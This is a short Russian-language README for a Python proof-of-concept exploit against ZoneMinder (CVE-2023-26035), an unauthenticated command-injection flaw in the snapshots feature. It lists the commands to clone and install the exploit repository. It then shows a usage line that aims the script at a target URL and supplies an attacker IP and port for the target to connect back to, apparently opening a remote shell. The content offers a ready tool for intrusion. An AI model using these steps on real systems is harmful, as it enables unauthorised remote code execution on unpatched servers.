
Это скрипт на Python, позволяющий эксплуатировать уязвимость Zoneminder, описанную в CVE-2023-26035.
Это скрипт на Python, который позволяет эксплуатировать уязвимость безопасности Zoneminder, описанную в CVE-2023-26035. Система уязвима в версиях до 1.36.33 и 1.37.33.
Клонируйте репозиторий на свой компьютер и установите зависимости с помощью pip (рекомендуется использовать virtualenv для создания окружения, чтобы изолировать эти установки от глобальных)
git clone https://github.com/m3m0o/zoneminder-snapshots-rce-poc
cd zoneminder-snapshots-rce-poc
pip install -r requirements.txt
Скрипту требуется целевой URL с корневым путём Zoneminder (например, http://example.com/zm, http://example.com или http://example.com/zoneminder), IP или домен целевой машины для подключения и порт целевой машины для подключения. Вот пример:
python3 main.py -u http://zoneminder.target:8000 -i 10.10.14.56 -p 443

Неавторизованное RCE в снимках
База данных уязвимостей и эксплойтов Rapid7: ZoneMinder Snapshots Command Injection